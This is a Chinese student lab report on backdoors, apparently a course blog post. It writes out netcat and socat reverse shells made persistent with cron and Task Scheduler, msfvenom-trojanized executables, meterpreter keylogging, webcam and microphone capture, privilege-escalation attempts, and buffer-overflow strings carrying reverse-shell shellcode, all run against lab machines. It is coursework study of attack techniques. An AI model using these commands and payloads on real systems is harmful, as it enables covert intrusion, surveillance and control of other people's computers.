網路對抗實驗2—後門原理與實踐

阿新 • • 發佈：2022-04-01

實驗報告

課程：網路對抗技術

班級：1912 姓名：陳發強學號：20191206

實驗名稱：後門原理與實踐實驗日期：2022.3.31

實驗目的

瞭解網路後門的原理與危害。
學會使用 netcat 、socat 獲取主機 shell
理解 TCP 反彈 shell 的原理
初步掌握 metasploit 的使用

實驗內容

使用netcat獲取主機操作Shell，cron啟動
使用socat獲取主機操作Shell, 任務計劃啟動
使用MSF meterpreter 生成可執行檔案，利用ncat或socat傳送到主機並執行獲取主機Shell
使用MSF meterpreter 生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容，並嘗試提權
使用MSF生成shellcode 注入到實踐1中的pwn1中，獲取反彈連線Shell

實驗過程

（一）使用netcat獲取主機操作Shell，cron啟動

思路：

攻擊者持續監聽 1206 埠
受害者 cron 新增定時任務，定時反向連線攻擊者的1206埠

過程：

攻擊者 Windows 10 IP ：192.168.144.134

受害者 Kali IP ：192.168.144.151

windows 使用natcat監聽1206埠

ncat.exe -lvp 1206

kali 使用nc命令測試連通性

nc 192.168.144.134 1206 -e /bin/sh

可以連通

kali新增定時任務，執行nc命令，連線windows攻擊者

crontab -e

48 * * * * nc 192.168.144.134 1206 -e /bin/sh

windows用ncat監聽1206埠，等待每小時的48分，受害者kali主動連線自己

（二）使用socat獲取主機操作Shell, 任務計劃啟動

思路：

攻擊者kali使用socat監聽1206埠
受害者windows在任務啟動計劃中新增定時任務，定時主動連線kali的1206埠

過程：

攻擊者 Windows 10 IP ：192.168.144.134

受害者 Kali IP ：192.168.144.151

kali監聽1206埠

socat tcp-listen:1206 -

測試連通性

Windows

socat.exe TCP:192.168.144.151:1206 exec:cmd.exe   //報錯，管道不存在

socat.exe tcp:192.168.144.151:1206 exec:cmd.exe,pty,stderr

可以連通

windows新增定時任務，主動連線攻擊者kali

Win+R compmgmt.msc

在系統工具中，找到任務計劃程式，點選右側的建立任務

常規設定：任務名

觸發器：設定成一次吧

操作：設定成 C:\Users\doxide\Desktop\socat\socat.exe

      引數 tcp:192.168.144.151:1206 exec:cmd.exe,pty,stderr

其他保持預設即可

kali監聽1206埠，等待windows的主動連線

（三）使用MSF meterpreter（或其他軟體）生成可執行檔案，利用ncat或socat傳送到主機並執行獲取主機Shell

思路：

kali ncat 監聽，Win10 ncat連線 kali ，將hello.exe傳送給kali
kali 接收 hello.exe 並使用 msfvenom 植入反彈shell的後門
kali ncat 監聽，將毒化後的hello.exe 傳送給連線者 Win10
kali 進入msfconsole控制檯，監聽埠，等待Win10執行有毒的 hello.exe 連線自己，從而獲得shell

過程

kali接受windows的檔案

kali監聽，輸出重定向

nc -lvp 1206 > 1206hack.exe

windows連線，輸入重定向（坑：必須是絕對路徑）

ncat.exe 192.168.144.151 1206 < C:\Users\doxide\Desktop\hello.exe

kali毒化1206hack.exe

msfvenom -p windows/meterpreter/reverse_tcp -x ./1206hack.exe -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.144.151 LPORT=1206 -f exe > 1206hack.exe

//這個後來windows會顯示不能執行。其實不應該encoder，因為windows沒有decoder，payload會沒辦法執行，我覺得是這樣
//由於不是緩衝區溢位攻擊，也沒必要繞過字串的00截斷
//加上-k引數，保持原來程式的功能，改成

msfvenom -p windows/meterpreter/reverse_tcp -k -x ./1206hack.exe LHOST=192.168.144.151 LPORT=1206 -f exe > 1206hack.exe

//還是不能執行
//後來發現是 ncat 傳檔案沒傳完整，要耐心等待......
//然後加上encoder也是可以正常執行的
//-k 引數有點問題，在windows執行報錯了
//最後確定用下面這個

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp -x ./hello.exe -e x86/shikata_ga_nai -i 5 LHOST=192.168.144.151 LPORT=1206 -f exe > 1206hack.exe


或者

//單純的後門，沒有原來程式的功能
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.144.151 LPORT=1206 -f exe > 1206hack.exe

kali把有毒的1206hack.exe 傳回給windows

nc -lvp 1206 < 1206hack.exe

ncat.exe 192.168.144.151 1206 > C:\Users\doxide\Desktop\1206hack.exe

kali進入msf控制檯，準備監聽來自windows的反彈shell連線

對msf控制檯進行配置,依次輸入以下命令

use exploit/multi/handler		        #使用監聽模組
set payload windows/meterpreter/reverse_tcp     #使用與windows後門相同的payload
set LHOST 192.168.144.151			#Kali ip
set LPORT 1206                                  #kali port 

run

windows執行帶有後門的程式，kali msfconsole獲得session

（四）使用MSF meterpreter（或其他軟體）生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容，並嘗試提權

思路：

在上一步攻擊成功的基礎上，獲得session之後，使用相應指令，即可完成錄音、攝像頭、擊鍵記錄、截圖等功能
在獲得 session 的基礎上，POST 模組提權。

過程：

獲取錄音、攝像頭、擊鍵記錄、截圖

record_mic -d 5      //錄音 5 秒

webcam_list          //列出網路攝像頭        //沒有
webcam_snap          //用攝像頭拍照

keyscan_start        //開始記錄鍵盤
keyscan_dump         //顯示捕獲到的鍵盤記錄
keyscan_stop         //停止記錄鍵盤

screenshare          //生成一個html，用瀏覽器開啟，可以實時獲取螢幕資訊
screenshot           //獲取截圖

POST 模組提權

方法一：先試一下直接getsystem能不能行

getsystem          //報錯了

getuid

方法二：嘗試利用其它漏洞提權

search ms16 arch:x64
                                                                                                                                                                                                     
Matching Modules
================

   #  Name                                                       Disclosure Date  Rank    Check  Description
   -  ----                                                       ---------------  ----    -----  -----------
   0  exploit/windows/browser/ms16_051_vbscript                  2016-05-10       normal  No     Internet Explorer 11 VBScript Engine Memory Corruption
   1  exploit/windows/fileformat/office_ole_multiple_dll_hijack  2015-12-08       normal  No     Office OLE Multiple DLL Side Loading Vulnerabilities
   2  exploit/windows/local/ms16_075_reflection                  2016-01-16       normal  Yes    Windows Net-NTLMv2 Reflection DCOM/RPC
   3  exploit/windows/local/ms16_075_reflection_juicy            2016-01-16       great   Yes    Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)
   4  exploit/windows/local/ms16_014_wmi_recv_notif              2015-12-04       normal  Yes    Windows WMI Receive Notification Exploit

//都不行
//換一個
use post/windows/escalate/ms10_073_kbdlayout              //也不行，Windows 10 (10.0 Build 10240). is not vulnerable.

//看來win10還是有些東西

方法三：盜取令牌

meterpreter > use incognito //進入這個模組
meterpreter > list_tokens –u //檢視存在的令牌
meterpreter > impersonate_token NT AUTXXXX\SYSTEM //令牌是DelegationTokens一列，getuid檢視，兩個斜槓
//失敗

方法四：Bypassuac

use exploit/windows/local/bypassuac

//失敗 Windows 10 (10.0 Build 10240). is not vulnerable.

方法五：Hash

use post/windows/gather/smart_hashdump

//失敗，許可權不夠

方法六：新增服務

use exploit/windows/local/service_permissions          //失敗
    
search service arch:x64 platform:windows

Matching Modules
================

   #   Name                                                               Disclosure Date  Rank       Check  Description
   -   ----                                                               ---------------  ----       -----  -----------
   0   exploit/windows/local/applocker_bypass                             2015-08-03       excellent  No     AppLocker Execution Prevention Bypass
   1   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move       2020-03-10       excellent  Yes    Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability
   2   exploit/windows/local/cve_2020_17136                               2020-03-10       normal     Yes    CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP
   3   exploit/windows/local/anyconnect_lpe                               2020-08-05       excellent  Yes    Cisco AnyConnect Privilege Escalations (CVE-2020-3153 and CVE-2020-3433)
   4   exploit/multi/misc/osgi_console_exec                               2018-02-13       normal     Yes    Eclipse Equinox OSGi Console Command Execution
   5   exploit/multi/misc/freeswitch_event_socket_cmd_exec                2019-11-03       excellent  Yes    FreeSWITCH Event Socket Command Execution
   6   exploit/windows/local/gog_galaxyclientservice_privesc              2020-04-28       excellent  Yes    GOG GalaxyClientService Privilege Escalation
   7   exploit/windows/smb/generic_smb_dll_injection                      2015-03-04       manual     No     Generic DLL Injection From Shared Resource
   8   exploit/windows/http/generic_http_dll_injection                    2015-03-04       manual     No     Generic Web Application DLL Injection
   9   exploit/windows/misc/hp_dataprotector_cmd_exec                     2014-11-02       excellent  Yes    HP Data Protector 8.10 Remote Command Execution
   10  exploit/multi/misc/java_jdwp_debugger                              2010-03-12       good       Yes    Java Debug Wire Protocol Remote Code Execution
   11  exploit/windows/smb/smb_relay                                      2001-03-31       excellent  No     MS08-068 Microsoft Windows SMB Relay Code Execution
   12  exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077  2021-09-16       excellent  Yes    ManageEngine ServiceDesk Plus CVE-2021-44077
   13  exploit/windows/local/nvidia_nvsvc                                 2012-12-25       average    Yes    Nvidia (nvsvc) Display Driver Service Local Privilege Escalation
   14  exploit/windows/fileformat/office_ole_multiple_dll_hijack          2015-12-08       normal     No     Office OLE Multiple DLL Side Loading Vulnerabilities
   15  exploit/windows/http/oracle_endeca_exec                            2013-07-16       excellent  Yes    Oracle Endeca Server Remote Command Execution
   16  exploit/windows/local/current_user_psexec                          1999-01-01       excellent  No     PsExec via Current User Token
   17  exploit/windows/local/bits_ntlm_token_impersonation                2019-12-06       great      Yes    SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.
   18  exploit/windows/sage/x3_adxsrv_auth_bypass_cmd_exec                2021-07-07       good       Yes    Sage X3 Administration Service Authentication Bypass Command Execution
   19  exploit/windows/misc/webdav_delivery                               1999-01-01       manual     No     Serve DLL via webdav server
   20  exploit/windows/http/sitecore_xp_cve_2021_42237                    2021-11-02       excellent  Yes    Sitecore Experience Platform (XP) PreAuth Deserialization RCE
   21  exploit/windows/winrm/winrm_script_exec                            2012-11-01       manual     No     WinRM Script Exec Remote Code Execution
   22  exploit/windows/local/service_permissions                          2012-10-15       great      No     Windows Escalate Service Permissions Local Privilege Escalation
   23  exploit/windows/local/ms16_075_reflection                          2016-01-16       normal     Yes    Windows Net-NTLMv2 Reflection DCOM/RPC
   24  exploit/windows/local/ms16_075_reflection_juicy                    2016-01-16       great      Yes    Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)

嘗試了十幾個一下，好像都不太行

唉，不能操之過急，還是先資訊蒐集吧

run post/multi/recon/local_exploit_suggester        //先漏洞掃描一波

run post/windows/gather/checkvm`                   //看看是不是虛擬機器

run post/windows/gather/forensics/enum_drives      //看眼磁碟分割槽

run post/windows/gather/enum_services              //看看開了什麼服務

run post/windows/gather/enum_applications          //看看應用軟體

run post/windows/gather/dumplinks                  //看看最近的操作

run post/windows/gather/enum_logged_on_users        //看看登入的使用者

run post/windows/gather/enum_snmp                  //看看有沒有snap服務


//也看不出來有什麼漏洞......

（五）使用MSF生成shellcode,注入到實踐1中的pwn1中，獲取反彈連線Shell

思路：

生成shellcode
MSF監聽
注入pwn1，反彈shell
遠端注入Ubuntu

過程：

使用msfvenom生成shellcode

先找一個合適的payload

msfvenom -l payloads | grep linux | grep x86 | grep tcp | grep reverse

    linux/x86/meterpreter/reverse_ipv6_tcp              Inject the mettle server payload (staged). Connect back to attacker over IPv6
    linux/x86/meterpreter/reverse_nonx_tcp              Inject the mettle server payload (staged). Connect back to the attacker
    linux/x86/meterpreter/reverse_tcp                   Inject the mettle server payload (staged). Connect back to the attacker
    linux/x86/meterpreter/reverse_tcp_uuid              Inject the mettle server payload (staged). Connect back to the attacker
    linux/x86/meterpreter_reverse_tcp                   Run the Meterpreter / Mettle server payload (stageless)
    linux/x86/metsvc_reverse_tcp                        Stub payload for interacting with a Meterpreter Service
    linux/x86/shell/reverse_ipv6_tcp                    Spawn a command shell (staged). Connect back to attacker over IPv6
    linux/x86/shell/reverse_nonx_tcp                    Spawn a command shell (staged). Connect back to the attacker
    linux/x86/shell/reverse_tcp                         Spawn a command shell (staged). Connect back to the attacker
    linux/x86/shell/reverse_tcp_uuid                    Spawn a command shell (staged). Connect back to the attacker
    linux/x86/shell_reverse_tcp                         Connect back to attacker and spawn a command shell
    linux/x86/shell_reverse_tcp_ipv6                    Connect back to attacker and spawn a command shell over IPv6

//本次shellcode不能有 \x00和\x0a  使用-b引數

//試一下 linux/x86/meterpreter/reverse_tcp

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.144.151 LPORT=1206 -b '\x00\x0a' -f c 

//把生成的shellcode放到C程式碼中進行驗證
//gcc -m32 ; exestack -s;
//能短暫連線上msfconsole的監聽並生成會話，但會立即爆出段錯誤退出。

===========================================================================================================

//排查是否是 64 位的問題
//試一下 linux/x64/meterpreter/reverse_tcp

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.144.151 LPORT=1206 -b '\x00\x0a' -f c 

//C語言執行shellcode，還是一樣的短暫連線，爆段錯誤
//64位也爆段錯誤，可能是payload的問題

===========================================================================================================

//多換幾個payload

msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.144.151 LPORT=1206 -b '\x00\x0a' -f c                              //失敗

msfvenom -p linux/x86/metsvc_reverse_tcp LHOST=192.168.144.151 LPORT=1206 -e x86/shikata_ga_nai -b '\x00\x0a' -f c       //失敗

msfvenom -p linux/x86/shell/reverse_nonx_tcp LHOST=192.168.144.151 LPORT=1206 -b '\x00\x0a' -f c                         //失敗

msfvenom -p linux/x86/shell/reverse_nonx_tcp LHOST=192.168.144.151 LPORT=1206 -e x86/shikata_ga_nai -b '\x00\x0a' -f c   //失敗

//編碼與否不影響shellcode的正常執行  -e x86/shikata_ga_nai

msfvenom -p linux/x86/meterpreter/reverse_tcp_uuid LHOST=192.168.144.151 LPORT=1206 -b '\x00\x0a' -f c                   //失敗

===========================================================================================================

//看來不是payload的問題
//後知後覺，msfvenom的payload換了，mfs監聽的payload沒換
//重新嘗試

msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.144.151 LPORT=1206 -e x86/shikata_ga_nai -i 5 -b '\x00\x0a' -f c

//可以了

注入1206pwn

實驗一的緩衝區溢位攻擊的準備工作就略過了

返回應地址覆蓋為 0xffffd170

perl -e 'print "A" x 32;print "\x70\xd1\xff\xff";print "\xbf\xf7\x44\x67\x81\xd9\xcc\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x3a\x31\x7d\x15\x03\x7d\x15\x83\xed\xfc\xe2\x02\xff\xc0\x23\xd0\x76\xd5\xff\xf1\x03\xcd\x0b\x5c\xdd\xc4\x45\x6a\x2c\x8a\xb7\x11\xa3\xc8\xbb\xef\x90\xef\x3f\xd2\xb0\xae\x38\xaa\xce\xcb\xe1\x3e\x44\x5d\x10\xe1\x40\x65\x8a\x33\x90\x59\x51\x63\x57\x58\xb1\xab\x33\x78\x02\xc1\x52\xe0\x0e\x46\x23\x8a\xd8\x92\x12\xcf\x6e\x36\x59\xbc\xe9\x7a\xf7\x73\xfc\xe6\x87\xb6\x3e\x4a\x1c\xed\x36\x33\xed\xae\x90\x5d\xf3\x94\xb1\x2d\xad\x17\x37\x75\xb8\x1d\x06\xdf\xf6\x1c\x8a\x8e\x84\xa3\xa7\xeb\xbd\x0b\x76\x46\x04\xbd\x04\xdf\x97\xe4\x3b\x2a\x26\x6d\x2f\xc2\x92\xea\xfe\x92\x14\x93\xea\x77\x04\xa2\xd6\x84\xca\xe3\xc2\xa3\x29\x68\xd0\xe5\x78\xeb\x1d\xb7\x86\x04\xee\x57\xf3\xaf\x7f\xf0\x97\x72\xf1\x6c\xe8\xd0\x9c\xc6\x45\x6d\xba\x41\x07\x6c\xf9\x0b\xf6\x09\xc3\x79\x03\x66\x4a\x7e\x7b\x01\x4c\x23\x57\xc3\x11\xca\xd8\xde\x1e\x04\xaa\xbf\x18\x85\x66\xc3\x19\xb7\x93\x2d\xd4\x59\x61\x64\x26\x65\x33\x15\x27\xe1\xf0\xab\xd4\x53\xad\x7b\xe9\x69\x4f\xd7\xe4\x11\x69\x4a\x9c\xf1\xd2\x93\x57"'> hack2.bin

（cat hack2.bin ; cat）| ./1206pwn

//段錯誤

GDB attach一下，layout asm ； x/16x 0xffffd170

//shellcode確實寫進去了，eip也成功跳轉了

錯誤排查

1. 是否是編碼問題？        //刪除-e引數，再來一遍，還是不行

2. 是否是payload問題？    //換一個，linux/x86/meterpreter/reverse_tcp 還是不行

3. 是否是 -b 的問題？     //反彙編一下有-b 的shellcode，再反彙編一下沒有-b 的shellcode

//發現，這兩個的組合語言差距有些大，沒有-b引數的彙編明顯更合理一些。猜測-b引數可能對shellcode進行了轉換，而轉換之後不能直接用於緩衝區溢位攻擊。

//尋尋覓覓，發現linux/x86/meterpreter/reverse_nonx_tcp的名字挺有意思的，不會是生成的shellcode沒有\x00的意思吧？

4. 嘗試payload換成linux/x86/meterpreter/reverse_nonx_tcp    //生成shellcode一看，果然沒有0x00；再反彙編一看，彙編也挺合理。

//而且和我實驗一寫的 tcp反彈shellcode比較相似。

//我實驗一的 tcp反彈shellcode 是可以配合 MSF或nc 攻擊成功的

//預感這次沒問題

高興地拿新的shellcode注入1206pwn

perl -e 'print "A" x 32;print "\x70\xd1\xff\xff";print "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x97\x5b\x68\xc0\xa8\x90\x97\x66\x68\x04\xb6\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\x5b\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1
"'> hack2.bin

//msfconsole 監聽

(cat hack2.bin ;cat) | ./1206pwn

//成功！！！

Ubuntu 遠端注入 kali，緩衝區溢位攻擊，kali 反彈 shell 回連 Ubuntu

Ubuntu 攻擊者 IP = 192.168.144.137 msfconsole 監聽 1206 埠
Kali 受害者 IP = 192.168.144.151 在 1206 埠執行有緩衝區溢位漏洞的 1206pwn

先測試一下kali本地注入能否連上 Ubuntu 的 msfconsole，測試成功啊，就不截圖了。

下面開始遠端注入

kali

nc -lvp 1206 -e ./1206pwn

Ubuntu

msfconsole 啟一個監聽，payload用對應的 linux/x86/shell/reverse_nonx_tcp

msfvenom -p linux/x86/shell/reverse_nonx_tcp LHOST=192.168.144.137 LPORT=1206 -f c

perl -e 'print "A" x 32;print "\x70\xd1\xff\xff";print "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x97\x5b\x68\xc0\xa8\x90\x89\x66\x68\x04\xb6\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\x5b\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1"'>hack.bin

(cat hack.bin ;cat) | nc 192.168.144.151 1206

哇，終於成功了！果然肯花時間還是能做出來的。

可以看到 Ubuntu msf 已經拿到了 session

接下來即使只要kali的1206pwn還在執行，會話就能保持

kali，除了nc顯示有連線以外，沒有其他異常

實驗體會

本次實驗踩了不少的坑，而且網上也搜不到相關的解決辦法，在這四面楚歌的情況下，我還是想把實驗完完本本地做出來。尤其是在 POST 模組 win10 提權，和 msfvenom 生成 shellcdoe 注入 pwn1 的實驗中，我看到不少同學放棄了win10的提權，不能緩衝區溢位攻擊注入shellcode，就直接毒化ELF檔案，但是我不想這樣。

我回想了一下老師上課說的排查問題的方法，並有意識地運用到本次實驗中。所幸基礎知識比較紮實，通過不斷控制單一變數的方法，不斷嘗試，還真的解決了一些問題。同時進一步認識到，檢視官方手冊和使用help 是重要的學習途徑，當然這要建立在有了一定的經驗和理解的基礎上。

這次能用msfvenom生成能緩衝區溢位的shellcode，也是建立在實驗一的基礎上。如果沒有親手寫過execve nc 反彈shell的彙編的話，也許永遠也發現不了加了-b 引數的shellcode是不太對勁的，也就不會想到linux/x86/shell/reverse_nonx_tcp可能是大佬留下的沒有0x00截斷的shellcode，也就不會多次嘗試這個payload。其他的 payload 不是有 0x00 就是有 0x0a ，加了 -b 又不能正常緩衝區溢位成功。

不得不說知識的相互交叉，還真是奇妙。

代價就是耗費了大量的時間，二十多個小時不知不覺就過去了，真是一個bug改一天......

最後我還是把辛苦得到的實驗成果，分享給了同學，哈哈，獨樂樂不如眾樂樂

實驗最開始還有一個小插曲，cron 選編輯器，看到官方標註nano最簡單，然後選了nano，結果不是圖形化的介面，也沒vim用得熟悉，就想換成vim，結果換不了...差點吐血...還好發現了select-editor命令，設定使用者的優先編輯器為vim，然後重啟cron就是vim編輯了。

基礎問題回答

(1)例舉你能想到的一個後門進入到你係統中的可能方式？

下載非官方軟體。
網站漏洞。比如說我如果把自己的小破網站開起來，就會存在檔案上傳漏洞啊，SQL注入漏洞啊，XSS啊...
利用漏洞寫個後門，在拿個菜刀蟻劍連線還是輕輕鬆鬆的。
SSH弱口令。不少機器都是開了SSH遠端登入的，弱口令爆破。
主動插入帶毒的U盤，或者別人趁我不注意，插入帶毒的U盤

(2)例舉你知道的後門如何啟動起來(win及linux)的方式？

windows

開機自啟動
登錄檔啟動
定時工作管理員
配合其他漏洞，如遠端命令執行
網站直接訪問。比如已經成功寫入了PHP的一句話木馬，直接訪問就可以了，菜刀蟻劍也可以。

linux

cron定時任務
執行帶後門的程式
配合其他漏洞，如遠端命令執行
網站直接訪問。比如已經成功寫入了PHP的一句話木馬，直接訪問就可以了，菜刀蟻劍也可以。

(3)Meterpreter有哪些給你映像深刻的功能？

功能強。

集成了很多模組，從資訊蒐集，到花式滲透攻擊，再到提權，全都有對應的功能模組。
入門快。

search，use ，set ，options，run，session，基本就可以用起來了。
精通難。

要成功利用漏洞，就必須要知道漏洞的細節和原理。如果只是稀裡糊塗地、淺嘗輒止地攻擊，msf那麼多功能放在那也是白搭。
我在本次實驗中也體會到了，即使湊巧選對了 payload，不根據實際情況進行調整，也是不會輕易成功的。

(4)如何發現自己有系統有沒有被安裝後門？

防毒軟體
異常開啟的埠
流量分析
檢查定時任務
系統莫名其妙地出現異常、風扇異常響起、記憶體突然增加......
手工檢查工作管理員、啟動項、登錄檔......